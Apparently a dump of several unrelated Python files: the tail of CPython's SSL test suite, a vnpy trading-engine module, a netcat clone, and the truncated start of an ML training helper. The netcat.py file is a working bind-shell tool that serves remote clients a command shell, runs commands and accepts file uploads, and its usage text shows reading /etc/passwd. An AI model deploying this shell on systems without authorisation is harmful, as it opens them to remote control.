with server:
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check if it is sane
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
# and compare with the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
if support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# is it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNone(cb_data)
self.assertEqual(len(cb_data), 12) # True for TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
if support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { None, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed for this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1.0/0.0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_main(verbose=False):
if support.verbose:
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, REMOTE_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicTests, BasicSocketTests, SSLErrorTests]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
engine.py | """
"""
import logging
import smtplib
import os
from abc import ABC
from datetime import datetime
from email.message import EmailMessage
from queue import Empty, Queue
from threading import Thread
from typing import Any, Sequence, Type
from vnpy.event import Event, EventEngine
from .app import BaseApp
from .event import (
EVENT_TICK,
EVENT_ORDER,
EVENT_TRADE,
EVENT_POSITION,
EVENT_ACCOUNT,
EVENT_CONTRACT,
EVENT_LOG
)
from .gateway import BaseGateway
from .object import (
CancelRequest,
LogData,
OrderRequest,
SubscribeRequest,
HistoryRequest
)
from .setting import SETTINGS
from .utility import get_folder_path, TRADER_DIR
class MainEngine:
"""
Acts as the core of VN Trader.
"""
def __init__(self, event_engine: EventEngine = None):
""""""
if event_engine:
self.event_engine = event_engine
else:
self.event_engine = EventEngine()
self.event_engine.start()
self.gateways = {}
self.engines = {}
self.apps = {}
self.exchanges = []
os.chdir(TRADER_DIR) # Change working directory
self.init_engines() # Initialize function engines
def add_engine(self, engine_class: Any):
"""
Add function engine.
"""
engine = engine_class(self, self.event_engine)
self.engines[engine.engine_name] = engine
return engine
def add_gateway(self, gateway_class: Type[BaseGateway]):
"""
Add gateway.
"""
gateway = gateway_class(self.event_engine)
self.gateways[gateway.gateway_name] = gateway
# Add gateway supported exchanges into engine
for exchange in gateway.exchanges:
if exchange not in self.exchanges:
self.exchanges.append(exchange)
return gateway
def add_app(self, app_class: Type[BaseApp]):
"""
Add app.
"""
app = app_class()
self.apps[app.app_name] = app
engine = self.add_engine(app.engine_class)
return engine
def init_engines(self):
"""
Init all engines.
"""
self.add_engine(LogEngine)
self.add_engine(OmsEngine)
self.add_engine(EmailEngine)
def write_log(self, msg: str, source: str = ""):
"""
Put log event with specific message.
"""
log = LogData(msg=msg, gateway_name=source)
event = Event(EVENT_LOG, log)
self.event_engine.put(event)
def get_gateway(self, gateway_name: str):
"""
Return gateway object by name.
"""
gateway = self.gateways.get(gateway_name, None)
if not gateway:
self.write_log(f"找不到底层接口:{gateway_name}")
return gateway
def get_engine(self, engine_name: str):
"""
Return engine object by name.
"""
engine = self.engines.get(engine_name, None)
if not engine:
self.write_log(f"找不到引擎:{engine_name}")
return engine
def get_default_setting(self, gateway_name: str):
"""
Get default setting dict of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.get_default_setting()
return None
def get_all_gateway_names(self):
"""
Get all names of gatewasy added in main engine.
"""
return list(self.gateways.keys())
def get_all_apps(self):
"""
Get all app objects.
"""
return list(self.apps.values())
def get_all_exchanges(self):
"""
Get all exchanges.
"""
return self.exchanges
def connect(self, setting: dict, gateway_name: str):
"""
Start connection of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.connect(setting)
def subscribe(self, req: SubscribeRequest, gateway_name: str):
"""
Subscribe tick data update of a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.subscribe(req)
def send_order(self, req: OrderRequest, gateway_name: str):
"""
Send new order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_order(req)
else:
return ""
def cancel_order(self, req: CancelRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_order(req)
def send_orders(self, reqs: Sequence[OrderRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.send_orders(reqs)
else:
return ["" for req in reqs]
def cancel_orders(self, reqs: Sequence[CancelRequest], gateway_name: str):
"""
"""
gateway = self.get_gateway(gateway_name)
if gateway:
gateway.cancel_orders(reqs)
def query_history(self, req: HistoryRequest, gateway_name: str):
"""
Send cancel order request to a specific gateway.
"""
gateway = self.get_gateway(gateway_name)
if gateway:
return gateway.query_history(req)
else:
return None
def close(self):
"""
Make sure every gateway and app is closed properly before
programme exit.
"""
# Stop event engine first to prevent new timer event.
self.event_engine.stop()
for engine in self.engines.values():
engine.close()
for gateway in self.gateways.values():
gateway.close()
class BaseEngine(ABC):
"""
Abstract class for implementing an function engine.
"""
def __init__(
self,
main_engine: MainEngine,
event_engine: EventEngine,
engine_name: str,
):
""""""
self.main_engine = main_engine
self.event_engine = event_engine
self.engine_name = engine_name
def close(self):
""""""
pass
class LogEngine(BaseEngine):
"""
Processes log event and output with logging module.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(LogEngine, self).__init__(main_engine, event_engine, "log")
if not SETTINGS["log.active"]:
return
self.level = SETTINGS["log.level"]
self.logger = logging.getLogger("VN Trader")
self.logger.setLevel(self.level)
self.formatter = logging.Formatter(
"%(asctime)s %(levelname)s: %(message)s"
)
self.add_null_handler()
if SETTINGS["log.console"]:
self.add_console_handler()
if SETTINGS["log.file"]:
self.add_file_handler()
self.register_event()
def add_null_handler(self):
"""
Add null handler for logger.
"""
null_handler = logging.NullHandler()
self.logger.addHandler(null_handler)
def add_console_handler(self):
"""
Add console output of log.
"""
console_handler = logging.StreamHandler()
console_handler.setLevel(self.level)
console_handler.setFormatter(self.formatter)
self.logger.addHandler(console_handler)
def add_file_handler(self):
"""
Add file output of log.
"""
today_date = datetime.now().strftime("%Y%m%d")
filename = f"vt_{today_date}.log"
log_path = get_folder_path("log")
file_path = log_path.joinpath(filename)
file_handler = logging.FileHandler(
file_path, mode="a", encoding="utf8"
)
file_handler.setLevel(self.level)
file_handler.setFormatter(self.formatter)
self.logger.addHandler(file_handler)
def register_event(self):
""""""
self.event_engine.register(EVENT_LOG, self.process_log_event)
def process_log_event(self, event: Event):
"""
Process log event.
"""
log = event.data
self.logger.log(log.level, log.msg)
class OmsEngine(BaseEngine):
"""
Provides order management system function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(OmsEngine, self).__init__(main_engine, event_engine, "oms")
self.ticks = {}
self.orders = {}
self.trades = {}
self.positions = {}
self.accounts = {}
self.contracts = {}
self.active_orders = {}
self.add_function()
self.register_event()
def add_function(self):
"""Add query function to main engine."""
self.main_engine.get_tick = self.get_tick
self.main_engine.get_order = self.get_order
self.main_engine.get_trade = self.get_trade
self.main_engine.get_position = self.get_position
self.main_engine.get_account = self.get_account
self.main_engine.get_contract = self.get_contract
self.main_engine.get_all_ticks = self.get_all_ticks
self.main_engine.get_all_orders = self.get_all_orders
self.main_engine.get_all_trades = self.get_all_trades
self.main_engine.get_all_positions = self.get_all_positions
self.main_engine.get_all_accounts = self.get_all_accounts
self.main_engine.get_all_contracts = self.get_all_contracts
self.main_engine.get_all_active_orders = self.get_all_active_orders
def register_event(self):
""""""
self.event_engine.register(EVENT_TICK, self.process_tick_event)
self.event_engine.register(EVENT_ORDER, self.process_order_event)
self.event_engine.register(EVENT_TRADE, self.process_trade_event)
self.event_engine.register(EVENT_POSITION, self.process_position_event)
self.event_engine.register(EVENT_ACCOUNT, self.process_account_event)
self.event_engine.register(EVENT_CONTRACT, self.process_contract_event)
def process_tick_event(self, event: Event):
""""""
tick = event.data
self.ticks[tick.vt_symbol] = tick
def process_order_event(self, event: Event):
""""""
order = event.data
self.orders[order.vt_orderid] = order
# If order is active, then update data in dict.
if order.is_active():
self.active_orders[order.vt_orderid] = order
# Otherwise, pop inactive order from in dict
elif order.vt_orderid in self.active_orders:
self.active_orders.pop(order.vt_orderid)
def process_trade_event(self, event: Event):
""""""
trade = event.data
self.trades[trade.vt_tradeid] = trade
def process_position_event(self, event: Event):
""""""
position = event.data
self.positions[position.vt_positionid] = position
def process_account_event(self, event: Event):
""""""
account = event.data
self.accounts[account.vt_accountid] = account
def process_contract_event(self, event: Event):
""""""
contract = event.data
self.contracts[contract.vt_symbol] = contract
def get_tick(self, vt_symbol):
"""
Get latest market tick data by vt_symbol.
"""
return self.ticks.get(vt_symbol, None)
def get_order(self, vt_orderid):
"""
Get latest order data by vt_orderid.
"""
return self.orders.get(vt_orderid, None)
def get_trade(self, vt_tradeid):
"""
Get trade data by vt_tradeid.
"""
return self.trades.get(vt_tradeid, None)
def get_position(self, vt_positionid):
"""
Get latest position data by vt_positionid.
"""
return self.positions.get(vt_positionid, None)
def get_account(self, vt_accountid):
"""
Get latest account data by vt_accountid.
"""
return self.accounts.get(vt_accountid, None)
def get_contract(self, vt_symbol):
"""
Get contract data by vt_symbol.
"""
return self.contracts.get(vt_symbol, None)
def get_all_ticks(self):
"""
Get all tick data.
"""
return list(self.ticks.values())
def get_all_orders(self):
"""
Get all order data.
"""
return list(self.orders.values())
def get_all_trades(self):
"""
Get all trade data.
"""
return list(self.trades.values())
def get_all_positions(self):
"""
Get all position data.
"""
return list(self.positions.values())
def get_all_accounts(self):
"""
Get all account data.
"""
return list(self.accounts.values())
def get_all_contracts(self):
"""
Get all contract data.
"""
return list(self.contracts.values())
def get_all_active_orders(self, vt_symbol: str = ""):
"""
Get all active orders by vt_symbol.
If vt_symbol is empty, return all active orders.
"""
if not vt_symbol:
return list(self.active_orders.values())
else:
active_orders = [
order
for order in self.active_orders.values()
if order.vt_symbol == vt_symbol
]
return active_orders
class EmailEngine(BaseEngine):
"""
Provides email sending function for VN Trader.
"""
def __init__(self, main_engine: MainEngine, event_engine: EventEngine):
""""""
super(EmailEngine, self).__init__(main_engine, event_engine, "email")
self.thread = Thread(target=self.run)
self.queue = Queue()
self.active = False
self.main_engine.send_email = self.send_email
def send_email(self, subject: str, content: str, receiver: str = ""):
""""""
# Start email engine when sending first email.
if not self.active:
self.start()
# Use default receiver if not specified.
if not receiver:
receiver = SETTINGS["email.receiver"]
msg = EmailMessage()
msg["From"] = SETTINGS["email.sender"]
msg["To"] = SETTINGS["email.receiver"]
msg["Subject"] = subject
msg.set_content(content)
self.queue.put(msg)
def run(self):
""""""
while self.active:
try:
msg = self.queue.get(block=True, timeout=1)
with smtplib.SMTP_SSL(
SETTINGS["email.server"], SETTINGS["email.port"]
) as smtp:
smtp.login(
SETTINGS["email.username"], SETTINGS["email.password"]
)
smtp.send_message(msg)
except Empty:
pass
def start(self):
""""""
self.active = True
self.thread.start()
def close(self):
""""""
if not self.active:
return
self.active = False
self.thread.join()
|
netcat.py | # ./netcat.py -l -p 9999 -c
# ./netcat.py -t localhost -p 9999
# echo -ne "GET / HTTP/1.1\r\nHost: www.google.com\r\n\r\n" | ./netcat.py -t www.google.com -p 80
import sys
import socket
import getopt
import threading
import subprocess
# define some global variable
listen = False
command = False
upload = False
execute = ""
target = ""
upload_destination = ""
port = 0
def usage():
print "Net Tool"
print
print "Usage: netcat.py -t target_host -p port"
print "-l --listen - listen on [host]:[port] for incoming connections"
print "-e --execute=file_to_run - execute the given file upon receiving a connection"
print "-c --command - initialize a command shell"
print "-u --upload=destination - upon receiving connection upload a file and write to [destination]"
print
print
print "Example: "
print "netcat.py -t 192.168.0.1 -p 5555 -l -c"
print "netcat.py -t 192.168.0.1 -p 5555 -l -u=/home/ubuntu/target"
print "netcat.py -t 192.168.0.1 -p 5555 -l -e=\"cat /etc/passwd\""
print "echo 'ABCDEFGHI' | ./netcat.py -t 192.168.11.12 -p 135"
sys.exit(0)
def main():
global listen
global port
global execute
global command
global upload_destination
global target
if not len(sys.argv[1:]):
usage()
# read the commandline options
try:
opts, args = getopt.getopt(sys.argv[1:], "hle:t:p:cu:", ["help", "listen", "execute", "target", "port", "command", "upload"])
except getopt.GetoptError as err:
print str(err)
usage()
for o, a in opts:
if o in ("-h", "--help"):
usage()
elif o in ("-l", "--listen"):
listen = True
elif o in ("-e", "--execute"):
execute = a
elif o in ("-c", "--commandshell"):
command = True
elif o in ("-u", "--upload"):
upload_destination = a
elif o in ("-t", "--target"):
target = a
elif o in ("-p", "--port"):
port = int(a)
else:
assert False, "Unhandled Option"
# are we going to listen or just send data from stdin?
if not listen and len(target) and port > 0:
# read in the buffer from the commandline
# this will block, so send CTRL-D if not sending input
# to stdin
buffer = sys.stdin.read()
# send data off
client_sender(buffer)
# we are going to listen and potentially
# upload things, execute commands, and drop a shell back
# depending on our command line options above
if listen:
server_loop()
def client_sender(buffer):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
# connect to our target host
client.connect((target, port))
if len(buffer):
client.send(buffer)
while True:
# now wait for data back
recv_len = 1
response = ""
while recv_len:
data = client.recv(4096)
recv_len = len(data)
response += data
if recv_len < 4096:
break
print response
# wait for more input
buffer = raw_input("")
buffer += "\n"
# send it off
client.send(buffer)
except:
print "[*] Exception! Exiting."
# tear down the connection
client.close()
def server_loop():
global target
# if no target is defined, we listen on all interface
if not len(target):
target = "0.0.0.0"
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind((target, port))
server.listen(5)
while True:
client_socket, addr = server.accept()
# spin off a thread to handle our new client
client_thread = threading.Thread(target=client_handler, args=(client_socket,))
client_thread.start()
def run_command(command):
# trim the newline
command = command.rstrip()
# run the command and get the output back
try:
output = subprocess.check_output(command, stderr=subprocess.STDOUT, shell=True)
except:
output = "Failed to execute command.\r\n"
# send the output back to the client
return output
def client_handler(client_socket):
global upload
global execute
global command
# check for upload
if len(upload_destination):
# read in all of the bytes and write to our destination
file_buffer = ""
# keep reading data until none is available
while True:
data = client_socket.recv(1024)
if not data:
break
else:
file_buffer += data
# now we take these bytes and try to write them out
try:
file_descriptor = open(upload_destination, "wb")
file_descriptor.write(file_buffer)
file_descriptor.close()
# acknowledge that we wrote the file out
client_socket.send("Successfully saved file to %s\r\n" % upload_destination)
except:
client_socket.send("Failed to save file to %s\r\n" % upload_destination)
# if check for command execution
if len(execute):
# run the command
output = run_command(execute)
client_socket.send(output)
# now we go into another loop if a command shell was requested
if command:
while True:
# show a simple prompt
client_socket.send("<NETCAT:#> ")
# now we receive until we see a linefeed (enter key)
cmd_buffer = ""
while "\n" not in cmd_buffer:
cmd_buffer += client_socket.recv(1024)
# send back the command output
response = run_command(cmd_buffer)
# send back the response
client_socket.send(response)
if __name__ == '__main__':
main()
|
train.py | import copy
import datetime
import json
import time
import sys
import os
import os.path
import multiprocessing
import signal
import pickle
import shutil
from collections import defaultdict
from pathlib import Path
from abc import ABC, abstractmethod
from dataclasses import dataclass, is_dataclass
from typing import Optional, Any, Iterable, Dict, List, Union, Collection
try: # Literal might not be supported in python versions earlier than 3.7
from typing import Literal
except ImportError:
from typing_extensions import Literal
from .performance import setup_metrics, EvaluationMetric
from .monitor import Monitor
from .util import load_config
from tqdm import trange, tqdm
import numpy as np
class BaseModel(ABC):
@abstractmethod
def get_metadata(self) -> Dict:
pass
@abstractmethod
def evaluation_metrics(self) -> List[EvaluationMetric]:
pass
@abstractmethod
def save(self, save_path) -> Union[str, Path]:
pass
class MinibatchModel(BaseModel):
@abstractmethod
def fit_batch(self, batch) -> Dict:
pass
@abstractmethod
def evaluate_batch(self, batch) -> Dict:
pass
class FullbatchModel(BaseModel):
@abstractmethod
def fit_dataset(self, batch) -> Dict:
pass
@abstractmethod
def evaluate_dataset(self, batch) -> Dict:
pass
class JSONEncoder(json.JSONEncoder):
"Custom JSONEncoder which tries to encode filed types (like pathlib Paths) as strings"
def default(self, o):
if is_dataclass(o):
attributes = copy.copy(o.__dict__)
attributes['dataclass_name'] = o.__class__.__name__
attributes['dataclass_module'] = o.__module__
return attributes
try:
return json.JSONEncoder.default(self, o)
except TypeError:
return str(o)
class TrainingError(Exception):
def __init__(self, metadata, message):
self.metadata = metadata
self.message = message
def __str__(self):
return f"{self.message}\n Metadata was: {self.metadata}"
def run_experiments(num_experiments, experiment_kwargs_list, experiment_function, kwargs, rng=None):
if rng is None:
rng = np.random.RandomState()
total_num_experiments = len(experiment_kwargs_list)*num_experiments
try:
current_experiment = 0
for i in range(num_experiments):
for task_params in experiment_kwargs_list:
current_experiment += 1
print('Starting experiment {}/{}'.format(current_experiment, total_num_experiments))
print('Starting task with params {}'.format(task_params))
kwargs.update(task_params)
kwargs['random_seed'] = rng.randint(0, 2**32)
kwargs['experiment_function'] = experiment_function
p = multiprocessing.Process(target=worker, kwargs=kwargs)
p.start()
p.join()
if p.exitcode != 0:
# For now we assume that the process died because of out of memory exceptions
print("Process died with exit code 1.")
sys.exit(0)
except KeyboardInterrupt:
pass
def worker(*, experiment_function, device='cpu', backend='theano', **kwargs):
if not device == 'cpu':
if backend == 'pytorch':
kwargs['device'] = device
elif backend == 'theano':
print("Setting device {}".format(device))
import pygpu.gpuarray
import theano.gpuarray
theano.gpuarray.use(device)
print("Starting new training with parameters:")
metadata = dict()
metadata['command_line_params'] = kwargs
for param, value in sorted(kwargs.items()):
print(" {}: {}".format(param, value))
experiment_function(metadata=metadata, backend=backend, **kwargs)
def make_timestamp():
dt = datetime.datetime.now()
return dt.strftime("%Y-%m-%dT%H.%M.%S") # We choose this format to make the filename compatible with windows environmnets
def run_experiment(*, hyper_parameters=None, model_factory=None, **kwargs):
if hyper_parameters is not None:
for hp in hyper_parameters:
model = model_factory(hyper_parameters)
train(model=model, **kwargs)
@dataclass
class TrainingConfig(object):
""" Configuration dataclass for the mltrain.train.train function.
Args:
max_epochs (int): Train for at most this number of epochs
keep_snapshots (bool): If True, keep all checkpoints from training. If False, only the best and the lates
checkpoints are saved.
eval_time (int): Run the evaluation loop and checkpointing after this number of seconds has passed
eval_iterations (int): Run the evaluation loop after these many training iterations (batches)
eval_epochs (int): Run the evaluation loop after these many epochs have passed.
model_format_string (str): Use this format string for saving model checkpoint files.
do_pre_eval (bool): Run the evaluation loop before training starts.
"""
max_epochs: int = 1
keep_snapshots: Union[Literal['all', 'none', 'best'], bool] = 'none'
eval_time: Optional[int] = None
eval_iterations: Optional[int] = None
eval_epochs: int = 1
model_format_string: Optional[str] = None
do_pre_eval: bool = False
@dataclass
class TrainingArguments(object):
model: Union[BaseModel, FullbatchModel, MinibatchModel]
output_dir: Path
training_dataset: Iterable
evaluation_dataset: Iterable
training_config: TrainingConfig
metadata: Optional[Dict] = None
artifacts: Optional[Dict] = None
files: Optional[List[Path]] = None
def train(
*,
training_args: TrainingArguments):
model = training_args.model
metadata = training_args.metadata
output_dir = training_args.output_dir
training_dataset = training_args.training_dataset
evaluation_dataset = training_args.evaluation_dataset
best_performance, model_format_string, output_dir = setup_training(model=model,
training_config=training_args.training_config,
metadata=metadata,
artifacts=training_args.artifacts,
output_dir=output_dir,
files=training_args.files,)
try:
best_performance, best_model_path = training_loop(model=model,
training_dataset=training_dataset,
evaluation_dataset=evaluation_dataset,
training_config=training_args.training_config,
best_performance=best_performance,
model_checkpoint_format=model_format_string,
output_dir=output_dir
)
return best_performance, best_model_path
except Exception as e:
raise TrainingError(metadata, "Error during training") from e
def setup_training(
*,
model,
training_config: TrainingConfig,
output_dir,
files=None,
artifacts=None,
metadata=None):
model_format_string = training_config.model_format_string
if model_format_string is None:
model_format_string = model.__class__.__name__ + '_epoch-{epoch:.04f}_{metrics}'
output_dir = output_dir / make_timestamp()
while output_dir.exists():
time.sleep(1)
output_dir = output_dir / make_timestamp()
model_format_string = output_dir / model_format_string
setup_directory(output_dir)
if artifacts is not None:
